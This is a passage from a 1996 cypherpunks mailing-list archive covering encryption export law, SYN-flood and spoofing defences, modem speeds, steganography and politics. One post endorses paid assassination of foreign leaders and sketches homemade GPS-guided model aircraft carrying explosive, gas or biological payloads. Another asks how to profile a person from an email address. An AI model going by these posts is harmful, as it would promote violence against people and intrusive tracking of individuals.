Secretary; > or > (B) receive prior written authorization by the > Secretary. In other words, a "general license" means that rules may be established regulating the export of certain materials, as long prior written application or prior written authorization for the export is not required. For example, "Permission is hereby granted to export all encryption software with a key length not exceeding 40 bits; no written application is necessary." would be an example of a general license to export a particular type of software. >SEC. 5. PROMOTION OF COMMERCIAL ENCRYPTION PRODUCTS. > > (c) CONTROL OF EXPORTING BY SECRETARY.- > (2) ITEMS THAT DO NOT REQUIRE VALIDATED LICENSES.- > Only a general license may be required, except as > otherwise provided under the Trading With The Enemy Act > (50 U.S.C. App.1 et seq.) or the International Emergency > Economic Powers Act (50 U.S.C. 1701 et seq.) (but only to > the extent that the authority of the International > Emergency Economic Power Act is not exercised to extend > controls imposed under the Export Administration Act of > 1979), for the export or reexport of- > (A) any computer software, including computer > software with encryption capabilities, that is- > (i) generally available, as is, and designed > for installation by the user or purchaser; or > (ii) in the public domain (including on the > Internet) or publicly available because it > is generally accessible to the interested > public in any form; or > (B) any computing devise or computer hardware > solely because it incorporates or employs in > any form of computer software (including > computer software with encryption capabilities) > that is described in subparagraph (A). I interpret this to mean that export of this type of software can still be restricted by the terms of a "general license". Even though prior written permission cannot be required for export, export is permitted only if the terms of the general license are complied with. This is not the same as "unrestricted export of mass market software"; in fact, for some types of software, the "general license" rules could still forbid export entirely. The following section describes the conditions under which the Secretary of Commerce is required to grant a general license allowing export: > (3) COMPUTER SOFTWARE AND COMPUTER HARDWARE WITH > ENCRYPTION CAPABILITIES.- > (A) IN GENERAL.- Except as provided in subparagraph > (B), the Secretary shall authorize the export > or reexport of computer software and computer > hardware with encryption capabilities under a > general license for nonmilitary end-users in > any foreign country to which those exports of > computers software and computer hardware of > similar capability are permitted for use by > financial institutions that the Secretary > determines not to be controlled in fact by > United States persons. In other words, the Secretary must define the terms of the general license in such a way that software of "similar capability" to software that is exportable to foreign banks is also exportable for general use. Note that the requirement is that the software must be similar to software that can already be exported for use by foreign banks; it is neither necessary nor sufficient that similar products be available from foreign sources. The "similar products available from foreign competitors" rule was in the Leahy bill, but I see nothing like it in the pro-CODE bill. PGP could be held not to be of "similar capability" to the banking software, and not exportable under the terms of the general license, because it uses a different encryption algorithm, a different key length, and is capable of encrypting arbitrary data, not just financial transactions. In the future, if key escrow requirements were imposed on software exported to foreign banks, the same restriction could be imposed on software exported for general use. It seems to me that the idea behind section 3(A) is that if foreign bankers are willing to accept a certain level of encryption, then everyone else will accept it too, so the software industry will be able to make money exporting it; the few people who want something better (e.g. to protect their privacy against government wiretapping) don't have to be protected, because denying them protection won't cost the software companies any money. I include section 3(B) only for completeness, because it is mentioned in section 3(A): > (B) EXCEPTION.-The Secretary shall prohibit the > export or reexport of computer software and > computer hardware described in subparagraph (A) > to a foreign country if the Secretary > determines that there is substantial evidence > that such software and computer hardware will > be- > (i) diverted to a military end-use or an end- > use supporting international terrorism; > (ii) modified for military or terrorist end- > use; or > (iii) reexported without the authorization > required under Federal law. Do other people agree with this interpretation of the bill? Are most people satisfied that the bill would actually protect the right to export PGP and other strong encryption software? I haven't seen this discussed in this group before. I realize that this may be academic, because the bill is unlikely to pass now. From jbash at cisco.com Mon Sep 16 20:32:38 1996 From: jbash at cisco.com (John Bashinski) Date: Tue, 17 Sep 1996 11:32:38 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com> Message-ID: <199609162039.NAA10136@mort> > Well IPSec provides for authentication of endpoints which would identify the > syn attacker. Only if the attacker were so stupid as to put in valid authentication data identifying herself. I think IPSEC would allow you to throw away the SYNs without processing them and without putting anything in your incoming connection queue. On the other hand, you'd have to do all the authentication protocol and computation for each packet in order to determine that it was bogus. I can see where that could lead to a still worse denial-of-service attack if your IPSEC code wasn't properly written. > What amazes me is that routers happily pass packets with foreign IP return > addresses. Defining what a "foreign IP return address" is quickly becomes complicated. > I guess there is some valid utility to being able to originate a > connection that actually goes somewhere else for intiating a many to many > protocol. But I can't think of any practical application that would > necessarily be that way. As far as I know, nothing does that. > So why do routers let packets leave local networks that do not appear to > originate from said local network? Because routers don't know which networks are "local networks" and which networks are transit networks. When a router gets a packet from one of its interfaces, it has no way of knowing whether that packet originated on the local network, or was forwarded on by some other router... possibly from an original source a dozen network hops away. > Doesn't routing work "both ways" so to speak? Um, "both ways"? No, not really, if you mean what I think you mean. I think you're saying that, if a router receives a packet claiming to be from host A, and that packet doesn't come from the direction of host A, as defined by the direction in which the router itself would send a packet which was destined for host A, it should drop the packet. The problem with that is that, if host A sends a packet to host B, there's no guarantee that the path that packet takes is the same as the path a packet would take from host B to host A. It usually is, but not always. Transient routing assymetries are very common in routing protocols, and it's possible, and even occasionally useful, to set up networks where there are permanent asymmetries. It's a pretty basic part of the architecture of IP networks that routers forward based only on destination addresses. Changing this would break a lot of existing systems. Keeping both "to" and "from" route information for each destination would entail redesigning all the routing protocols now in use, as well as doubling the associated memory and computation requirements. It won't happen soon, if ever. It may happen that router vendors will start adding configurable options to discard suspicious packets in the (pretty common) case where routing is expected to be symmetric. Such options would have to be used with great care, by network administrators who were very sure they knew what they were doing. They couldn't be made the defaults without breaking the universe, so there'd always be people who should turn them on, but wouldn't. As it stands today, it's possibly to manually configure a router to reject packets that don't come from addresses expected on the interface the packets arrive on. Such filters are entirely static, and don't respond to changes in the network. It's reasonable to set them up on a "stub" link that forms the only path leading to a reasonably well-defined segment of the network... like a LAN, or a small site. It's much less reasonable on a router in the middle of a complex network, and more or less impossible in Internet "core" routers... unless you can anticipate every possible dynamic network change, your filters are going to get it wrong sometimes. Myself, I always configure routers to filter out bogus source addresses... when they're being installed at points in the network where it's obvious which addresses those are. Most ISPs don't do it even when it's easy, and that's one of the sources of the problem. -- John B. From jf_avon at citenet.net Mon Sep 16 20:33:22 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Tue, 17 Sep 1996 11:33:22 +0800 Subject: Flamewars and events of the outside world Message-ID: <9609162145.AA08344@cti02.citenet.net> Is there anybody who saw a correlation with the occurences of flamewars or nut-cases on the list with important things that happened in the outside world that could benefit from having the CPunks looking the other way? Like this one with "Anonymous" going on. And a few others lately. Some clueless or semi-outsiders seems to drop in the group and sling mud to detract every active participants from the other topics discussed (usually, more to the point with CP). I am not ranting about the answering, I'm simply puzzled by the phenomenon. Just like, as a rule here in Canada, every time the country is really going down and that everybody start getting fed-up of the govt, suddenly the debate on death penalty or abortion or racial equality or salary inequality among sexes just pops-up. Every times, it looks it happened purely as an happenstance but every time, there was something very fishy going on at another level. Ciao jfa Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jfricker at vertexgroup.com Mon Sep 16 20:55:44 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Tue, 17 Sep 1996 11:55:44 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW Message-ID: <2.2.32.19960916190033.010773d0@vertexgroup.com> At 11:33 AM 9/13/96 -0700, stewarts at ix.netcom.com wrote: > >At least one of the newspaper articles I've read has referred to the need >for real authentication on the net to prevent the anonymity that makes >this kind of attack possible, and in particular for the major network providers >to make sure that they don't export messages with bogus addressing, >a cure that the article said would take several months to deploy. >I don't know if they were referring to IPv6, or sendmail modifications, >or router hacks, or what; the article's author seemed to think this was >about bogusly-addressed email messages rather than understanding SYNs. > Well IPSec provides for authentication of endpoints which would identify the syn attacker. What amazes me is that routers happily pass packets with foreign IP return addresses. I guess there is some valid utility to being able to originate a connection that actually goes somewhere else for intiating a many to many protocol. But I can't think of any practical application that would necessarily be that way. So why do routers let packets leave local networks that do not appear to originate from said local network? Doesn't routing work "both ways" so to speak? From shamrock at netcom.com Mon Sep 16 21:18:48 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 12:18:48 +0800 Subject: 56 kbps modems In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Jay Gairson wrote: > Speaking of ISDN, how many people, can afford to have a personal ISDN > line in there house? And then afford to connect to something/someone > else on a next to permanent basis monthly? No problem here. My ISDN bill is a small fraction of my regular phone bill. --Lucky From dlv at bwalk.dm.com Mon Sep 16 21:26:23 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 12:26:23 +0800 Subject: Diffie Hellman - logs in Galois fields Message-ID: <97BDuD2w165w@bwalk.dm.com> paul at fatmans.demon.co.uk writes: > > Hi all, > > A question for the matematicians out there: > > I am looking at the Diffie Hellman public key exchange protocol and > am trying to find out why it is computationally hard to take logs in > a finite (Galois) field. I think polluting this mailing list with trivial questions such as this is just as bad as polluting it with personal attacks. Read the FAQs. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From aba at dcs.ex.ac.uk Mon Sep 16 21:41:27 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Tue, 17 Sep 1996 12:41:27 +0800 Subject: [Long] A history of Netscape/MSIE problems In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz> Message-ID: <199609142203.XAA00154@server.test.net> Peter Guttmann writes: > >Hadn't heard that before, that the trade secret requirement was > >imposed on RSADSI. What was your source for that info, it is an > >interesting assertion on the part of RSADSI, and I am intrigued. > > It's in AC II, p.319 (I was getting worried for a minute, I missed > it the first time I looked and then couldn't figure out where I'd > got the info from). I can't see anything suggesting that the trade secret status of the algorithm had anything to do with it's being granted special export status. All it says on 319 (the section on RC2) is: : It is proprietary, and its details have not been published... [of course since then someone did publish, anonymously] : ...An agreement between the Software Publishers Association (SPA) and : the US government gave RC2 and RC4 (see Section 17.1) special export : status (see Section 25.13). Sameer posted that someone at RSA once told him unofficially that the trade secret status was required. Schneier (courtesy of Ulf Moeller ) seems to be saying that it has nothing to do with it, in spite of RSADSIs claims: : Schneier writes (2nd ed., p. 398): "This special export status has : nothing to do with the secrecy of the algorithm, although RSA Data : Security, Inc. has hinted for years that it does." Adam From norm at netcom.com Mon Sep 16 21:49:06 1996 From: norm at netcom.com (Norman Hardy) Date: Tue, 17 Sep 1996 12:49:06 +0800 Subject: Gaining trust in OCO crypto code Message-ID: I agree with most of Bill's points. It is the right sort of analysis. At 3:06 PM 9/12/96, Bill Frantz wrote: .... >(2) Key generation. There are published ways to encode an RSA secret key >in the corresponding RSA public key. A key generation algorithm which only >uses 32 bits of the random number would be hard to detect, but easy to >break by one who knew its secret. You have to be able to examine in detail >how keys are generated. Actually if you generate 100,000 RSA keys with the algorithm the birthday effect says that you will have some collisions. Of course even 100,000 key generations takes a long time. .... >(1) Implementation of a cryptographic algorithm. If we can feed it enough >test cases, and compare the output with a public, well vetted >implementation, we can come to believe that it is correct. For some purposes. On the transmitting end if the enemy can choose the plain text then a tested but bogus implementation can take special action upon seeing a signal in the plain text stream. One such action would be to merely shut down. On the receiving end a bogus implementation can detect a signal inserted in the cipher text by the enemy and cause damage. I havn't thought of any low visibility attacks but I suspect that there may be some. If random number generation is specified not to be integral to RSA key generation, then two or more untrusted programs, from mutually hostile sources, can generate your RSA key if they yield the same output from the same input. In paranoia situations I would rather trust my keyboard random than an algorithm chosen by my enemy. From isptv at access.digex.net Mon Sep 16 21:51:58 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Tue, 17 Sep 1996 12:51:58 +0800 Subject: ISP-TV Interview with Solveig Bernstein Message-ID: <199609162351.QAA08718@comsec.com> *** ISP-TV Program Announcement: Interview with Solveig Bernstein *** Monday, September 16 9:00 PM ET Solveig Bernstein Assistant Director of Telecommunications & Technology Studies Cato Institute ISP-TV will present an interview with Solveig Bernstein from the Cato Institute. Ms. Bernstein will be discussing legal issues concerning the CDA, the upcoming Supreme Court case, and other telecom legal issues. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network From wb8foz at nrk.com Mon Sep 16 21:54:46 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 17 Sep 1996 12:54:46 +0800 Subject: Government awards GAK contract to Nothern Message-ID: <199609170159.VAA20797@nrk.com> Clarinet sez: OTTAWA, Sept. 16 (UPI) -- The federal government has chosen Northern Telecom's data security software, Entrust { } Public-Key Infrastructure (PKI)... for gov't use..... worth $7.3 million...... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close...........(v)301 56 LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead........vr vr vr vr.................20915-1433 From ravage at einstein.ssz.com Mon Sep 16 22:00:19 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 17 Sep 1996 13:00:19 +0800 Subject: 56 kbps modems (fwd) Message-ID: <199609170212.VAA07494@einstein> Forwarded message: > Date: Mon, 16 Sep 1996 17:56:43 -0700 (PDT) > From: Lucky Green > Subject: Re: 56 kbps modems > > On Mon, 16 Sep 1996, Jay Gairson wrote: > > > Speaking of ISDN, how many people, can afford to have a personal ISDN > > line in there house? And then afford to connect to something/someone > > else on a next to permanent basis monthly? > > No problem here. My ISDN bill is a small fraction of my regular phone bill. > Count me in. I am wired 24 hrs a day via ISDN. Jim Choate CyberTects ravage at ssz.com From nobody at replay.com Mon Sep 16 22:07:03 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 13:07:03 +0800 Subject: Searching an email address Message-ID: <199609170200.EAA13318@basement.replay.com> I have been trying to find out info re: someone via his email address and didn't find anything. The server is telaver.com, e.g., name at telaver.com Any suggestions outside of the usual search machines? From adam at homeport.org Mon Sep 16 22:09:09 1996 From: adam at homeport.org (Adam Shostack) Date: Tue, 17 Sep 1996 13:09:09 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <199609162039.NAA10136@mort> Message-ID: <199609170335.WAA23977@homeport.org> John Bashinski wrote: | > Well IPSec provides for authentication of endpoints which would | > identify the syn attacker. | | Only if the attacker were so stupid as to put in valid authentication | data identifying herself. | | I think IPSEC would allow you to throw away the SYNs without processing | them and without putting anything in your incoming connection queue. On the | other hand, you'd have to do all the authentication protocol and | computation for each packet in order to determine that it was bogus. I can | see where that could lead to a still worse denial-of-service attack if your | IPSEC code wasn't properly written. This is not correct. IPsec requires key negotiation, which takes place as or after a connection starts. (Photuris has a system where a new connection requires a cookie be traded before any expensive works gets done. It does not avoid all work.) Peter DaSilva, in a posting to firewalls, suggested that routers turn on record route on packets with SYN set. My initial reaction, that the core doesn't have the CPU, and the leafs will never deploy, turns out to be wrong; the big providers can make it a condition of connecting to them that this be done, and the problem of non-existant return addresses substantially diminishes as soon as cisco releases the software. The core routers don't change, since they are busy; the leafs do, since they need to connect to the core. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From mpd at netcom.com Mon Sep 16 22:13:14 1996 From: mpd at netcom.com (Mike Duvos) Date: Tue, 17 Sep 1996 13:13:14 +0800 Subject: 56 kbps modems In-Reply-To: Message-ID: <199609170112.SAA06725@netcom3.netcom.com> Jay Gairson writes: > Personally, by saying that no transmission on a standard > phoneline can have more than 3100 baud, is a statement > saying that technology and science, shall never advance, to > a point where things are possible. If you remember right, > just 10 or so years ago, we stated that 2400 baud was the > highest possible baud, and we would never go over. Baud denotes the number of state changes made by the modem on the line per second. The possible states generally form some sort of regular pattern in frequency/phase space, with each state being maintained long enough to reliably determine it on the other end. Before the advent of V32 and V32.bis modems, the underlying symbol rate was substantially lower than it is now. Then it was determined that it was possible to overdrive the line cards on digital switches to equalize them over a wider range of frequencies, without smoking them down. The newer modems take advantage of this kludge. Since the underlying digital data stream is eight thousand 8-bit u-law samples per second, there are genuine theoretical limits in terms of symbols per second which cannot be crossed. > My modem, running on a standard phone line, is a 28.8 > USRobotics modem, with the software, and hardware upgrades > to a 3400 baud, I get on an average day anywhere from 3500 > to 3600 baud for send/receive. On a bad day, I only get > 3100 to 3200. SO I would say, that my phone lines, are > cleaner than most eh? And Yes, I am in the US. Don't confuse "baud" in terms of characters per second through your modem with the low level symbol rate of the modem's analog output into the phone line. The "baud" you see is a function not only of the low level symbol rate, but of framing, the V.42 compression/error correction process, and other factors. > Speaking of ISDN, how many people, can afford to have a > personal ISDN line in there house? And then afford to > connect to something/someone else on a next to permanent > basis monthly? The price of ISDN is a function of phone company marketing, not the cost of providing the service. Domestic US service is almost entirely digital now, and moving the subscriber line interface to the consumer end, so the digital aspects of the network may be fully exploited, is not a conceptually expensive process. (Yes I know the software upgrade to ESS for ISDN costs a bundle.) -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From tcmay at got.net Mon Sep 16 22:14:57 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 13:14:57 +0800 Subject: U.S. Helped Wipe Out One of the Kurdish Factions Message-ID: At 9:00 PM 9/16/96, jim bell wrote: >condition which is forced on the victims. In addition, you almost always >find that these starving countries have well-supplied militaries, defending >the local warlords against each other as in Somalia. Indeed, in Somalia the >incoming food was actually used to buoy up one group against another, >because access to it is controlled directly or indirectly by the factions. The reports that the U.S. spent $100 million supporting the Kurdish struggle against the central government is a related point. The $100 M went into weapons, food, etc., which the U.S.-supported side used against the Iran-supported side. Then the U.S.-supported side allied themselves with the central government, however temporarily, and is not engaging in a "mopping up operation" (translation: summary execution of all members found of the losing side, including wives and children). Our $100 million helped wipe out the "losing side" Kurds, and also strengthened the previously-poor reputation of Saddam Hussein (who just got a unanimous vote of support from the Arab League foreign ministers meeting in Cairo...this likely explains why the weekend's predicted massive raid on Baghdad was shelved...Clinton is already backpedaling, and may send Hilary/Hillary to Baghdad to help the Baghdad "Save the Children" chapter). (Note: Only this last point, about Hilary, is made up...the rest is what is actually happening.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Mon Sep 16 22:21:02 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 17 Sep 1996 13:21:02 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: >>Yet another obligatory AP (Assassination Politics) reference: If a person >>is really interested in helping out "starving children" he may be able to do >>far more good by purchasing the death of the local tyrant(s), rather than >>(just) buying more food. > > >The problem is that assasination rarely leads to the installation of >a government that is any better. In most cases it gets worse. > >In the past the US excuse for supporting bloodthirsty murderers like >Pinochet, Saddam, Marcos and Noriega was that the alternative was >worse. > >In cases like Eritrea or Ethiopia the average term of office of any >given despot tends to be rather short in any case. In most cases its >a case of there being little to choose between the leaders of the >various factions and that ending the war on any terms is better >than allowing it to continue. > We've all heard these arguments, but are they true? Who says so, and how can they be certain? Jim's suggestion has never, to my knowledge, been tried on a consistant, large, scale. When all conventional alternatives have been tried and fail, what have we or the starving children got to lose? I'm sure there are qualified mercinaries available at the right price to put together wetwork operations, just look in soldier of fortune. I once had a hand in establishing a non-profit. Perhaps we can name it SPECTRE (SPecial Executive for Counter-intelligence, Terrorism, Revenge and Extortion) after Ian Flemming. Is it legal for citizens of the U.S. to engage in contract killing of foreign military, politations, etc? How about U.S. or foreign non-profits? In a related matter, I used to be an avid RC modeler. By marrying a single-board computers, DGPS (Differential GPS) and Giant Scale Remote Control technologies it now appears straightforward to produce inexpensive consumer cruise missiles capable of accurate (<10 meter radius) delivery of 10 kg. explosive, gas or biological payloads over several hundred km. for less than $10,000 each. Both reciprocating and miniature jet engines are available. Might make cheaper alternative to mercinaries. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From wb8foz at nrk.com Mon Sep 16 22:24:06 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 17 Sep 1996 13:24:06 +0800 Subject: 56 kbps modems In-Reply-To: <199609162239.IAA24591@mac.ce.com.au> Message-ID: <199609170214.WAA20862@nrk.com> craigw at dg.ce.com.au sez: > > That I realize that baud and bit/sec are not the same, but I feel you would > have a hard time getting a 56k modem to work on a line that does not > support 28.8k fully, let alone 33.6k. I'm trying to guess on the magic at work. Note that the far end must be a PRI. I wonder if they do some guessing as to the quantization points, then iterate. Also note there's no mention of the hype-writer's old friend, compression. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From jim at suite.suite.com Mon Sep 16 22:24:56 1996 From: jim at suite.suite.com (Jim Miller) Date: Tue, 17 Sep 1996 13:24:56 +0800 Subject: really undetectable crypto made somewhat practical Message-ID: <9609162334.AA17481@suite.com> The primary drawback to the stego scheme I described in the previous post was the ratio of stego bits per message. The scheme would only transmit an estimated 4 stego bits per message. Then it occurred to me that I can improve the ratio by basing the scheme on the hashes or words rather than the hashes of entire messages. Previous Scheme: construct a sequence of plaintext messages such that the first 4 bits of the MD5 hashes of the messages combine to produce the cyphertext of the true stego message. The sender would only need to send the plaintext messages. The recipient would calculate the MD5 hash of each plaintext message, extract the first four bits from each hash, append them together, then decrypt the result to obtain the true stego message. New Scheme: First, calculate the MD5 hash of all the words in the various dictionary files used by the password cracker program and create a database containing every word and the first 4 bits of its MD5 hash. Given such a database, it would be possible to write a program that accepts as input a block of cyphertext (the stego message, encrypted), chunks it up in to groups of 4 bits and then, for each chunk, displays the words that have hashes that start with those same four bits. The person running the program would select words that form meaningful sentences but also produce hashes that combine into the encrypted stego message. This scheme would send 4 stego bits per word. In addition to ordinary words, the database could contain names, misspelled words, abbreviations, words with alternate capitalization, slang terms, technical jargon, whatever. Fortunately, senders and receivers don't need to synchronize word databases. The recipient doesn't need to have any word database. The receiver can reconstruct the hidden encrypted message simply by calculating the MD5 hash of each word in the plaintext message, gathering up the appropriate hash bits and decrypting the result. This scheme could send more than 4 stego bits per word, but as you increase the number of stego bits per word (sbpw), you reduce the number of words that will work for a given chunk of cyphertext, making it harder to construct meaningful sentences (e.g. given a 40,000 word database, 4 sbpw yields 16 word groups with approx 2500 words per group; 8 sbpw yields 256 word groups with approx 156 words per group. 8 sbpw would probably not work well). Would this scheme work? It works in the sense that you can use it to send arbitrary encrypted messages through channels that don't allow anything but human-readable plaintext messages, but does it do so in an undetectable manner? I think so, but I don't know for sure. Jim_Miller at suite.com From azur at netcom.com Mon Sep 16 22:28:58 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 17 Sep 1996 13:28:58 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant). Message-ID: >On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn wrote: > >Remember the original purpose of social security. A government fund which >was self sustaining because it only gave out what was put in and gained by >investment. Not quite. You'll remember that SS was pitched to the masses as such during the Great Depression, but its true purpose was to allow older workers to quickly retire and make room for the largely unemployed men in their prime, family raising, years. > >> A social safety net is simply a form of health and life >> insurance. Statistical arbitrage if you will. > >Yes, but not for the reasons you would cite. Social safety nets prevent >rioting by the lower classes, revolution and general civil disorder >because they appease the masses. Indeed this is a form of health and life >insureance for the middle and upper classes. No doubt. See my previous comment. > >> By spreading the risk you >> minimize the cost. Yes, some people will take advantage of the system. >> But like a virus, a robust system should be able to withstand this form >> of attack. > >This is absolutely silly. Speading the risk alone does nothing. The cost >for those who can pay is increased, and the cost for those who cannot pay >is made 0 (it already was 0 incidently). > >It is also the reason the taxpayers (and not the savings and loan >community at large) were forced to bail out the failed financial >institutions. Namely, because premiums were not tied to risk. The FDIC, >as of last year in any event, charges a flat rate fee for all financial >institutions. This is independent of any risk analysis of their >investments. i.e., a financial institution that invests in trailor parks >in Arkansas pays the same premiums for federal deposit insurance as a >institution that invests in government issued debt instruments. (There is >some ceiling for risk, but not a graduated system below the ceiling). > >The result was (is) an incentive to risky investments. If you are a >financial institution and I tell you "I will charge you $1.00 to insure >$1000.00 of low risk and low profit investments, but I will charge you a >while $1.00 to insure $1000.00 of extremely risky but highly >profitable option and currency investments" which one are you going to >choose? (Hint, you're an idiot if you pick option #1). > >The reason the insurance fund was depleted is because there was no risk >balancing built into the system. The premiums did not cover the losses. >They would have if they were risk adjusted. > Next major recession: Here we go again. >Spreading the risk, by itself, does NOT reduce cost. You must properly >PRICE risk. > >This is the distinction between insurance and welfare. Right on! >Welfare merely hands out money for those who have not bothered or cannot >afford insurance. The result is an INCREASE in cost (taxes) to those who >are coughing up the cash so that they may support. > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From erp at digiforest.com Mon Sep 16 22:32:29 1996 From: erp at digiforest.com (Jay Gairson) Date: Tue, 17 Sep 1996 13:32:29 +0800 Subject: 56 kbps modems In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch> Message-ID: I personally, am not much for this, I am just one with various ideas, and questiosn and such, so here goes. On Mon, 16 Sep 1996, Remo Pini wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Mime-Version: 1.0 > Content-Type: text/plain > Content-Transfer-Encoding: 7bit > > To: cypherpunks at toad.com > Date: Mon Sep 16 15:59:53 1996 > I think I have to throw in some words here, too: > > 1. BAUD is one distingushable signal form. > 2. BPS is bits per second Ok, I agree with those. > > 3. NO transmission over a standard phoneline can have more than 3100 baud, > because the frequency of anything transmitted over that line is band > limited to 300hz - 3400hz. (If you have ISDN it's not relevant anyway, > since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in > usa) Personally, by saying that no transmission on a standard phoneline can have more than 3100 baud, is a statement saying that technology and science, shall never advance, to a point where things are possible. If you remember right, just 10 or so years ago, we stated that 2400 baud was the highest possible baud, and we would never go over. My modem, running on a standard phone line, is a 28.8 USRobotics modem, with the software, and hardware upgrades to a 3400 baud, I get on an average day anywhere from 3500 to 3600 baud for send/receive. On a bad day, I only get 3100 to 3200. SO I would say, that my phone lines, are cleaner than most eh? And Yes, I am in the US. Speaking of ISDN, how many people, can afford to have a personal ISDN line in there house? And then afford to connect to something/someone else on a next to permanent basis monthly? > > 4. Most modern transmission schemes work with multiple bits per baud. I.e. > you transmit 10 bits in one baud if you have a 31000 bps modem. the only > limitation in transmission speed is the amount of binary values you can > pack into one baud. that on the other hand is limited by the S/N (signal to > noise) ratio of your line. If you have a noise of 0.9%, you can't use more > than 100 steps or you have ambiguous signals. since people talk about 56000 > bps modems (we tried 34000 modems here and they couldn't produce more than > 28800 on a very good connection) that would mean, that you have to transmit > 18 bits = 262144 (!) distinguishable signal forms per baud. > > Comments? What about new ways of splitting the steps and baud more so that it shows less at a higher level.... Just a question.. Ahh well, I'm getting a page so I shall finish this now... Answer appreciated.. > > Remo Pini > > - ------< fate favors the prepared mind >------ > Remo Pini rp at rpini.com > PGP: http://www.rpini.com/crypto/crypto.html > - ----< words are what reality is made of >---- > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQEVAwUBMj1dWhFhy5sz+bTpAQHmVAgAqRHydyZdElXlwMSgdKB6hg1fDBCMfhia > JoI5W8n0JLcKe9HYN/H0DPqFHHDIATEhlN3b3OIhYCw52cNJ/e3b9Nbp5RQo+sDX > zAogz5wZiDV7EA/gL589lNQZ9VKHlgTYBLzu1tqyJ5cD2KhWEUjvXyN4lYuxcEQT > NIaiNPeYXrC0BeoLa/AE8mCrtu+7nhxy5HlSjDiu3lEYaVygKIPQHM3+Ljzq0jkq > bmbqJbTyZshos+5gxHyXLsbL8rkpST53YT4Z3clL6PCv1ntNGXtb/loWgIDallYJ > bHgfh/bAS5Utg7fpzuVNS8AJV8L2VLirScBd4Bq5RAXZxnoTVVQxOw== > =9JSI > -----END PGP SIGNATURE----- > Erp From brock at well.com Mon Sep 16 22:42:08 1996 From: brock at well.com (Brock N. Meeks) Date: Tue, 17 Sep 1996 13:42:08 +0800 Subject: All Bets Off Message-ID: Just so this isn't hanging in cyberspace forever, my $5,000 bet for anyone to prove the TWA 800 flight was downed by a U.S. missile is now *off the table*. It's been two-plus weeks since I tossed out the bet and no one took me up on it, so it's now being formally withdrawn. --Brock From jgrasty at gate.net Mon Sep 16 22:44:12 1996 From: jgrasty at gate.net (Joey Grasty) Date: Tue, 17 Sep 1996 13:44:12 +0800 Subject: WinSock Remailer Now Accepting Only PGP Encrypted Messages Message-ID: <199609170203.WAA113002@osceola.gate.net> Y'all: Effective immediately, the WinSock Remailer (operating at winsock at c2.org) will now accept only PGP encrypted messages. All incoming messages (with the exception of messages with subject headers of help, remailer-help, remailer-stats, and remailer-key) must now be encrypted with the public key for winsock at c2.org. All other messages will be rejected. Regards, Joey Grasty (jgrasty at gate.net) Jim Ray (liberty at gate.net) WinSock Remailer Operators -- Joey Grasty jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes] jgrasty at pts.mot.com [work -- designing pagers] "Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann PGP = 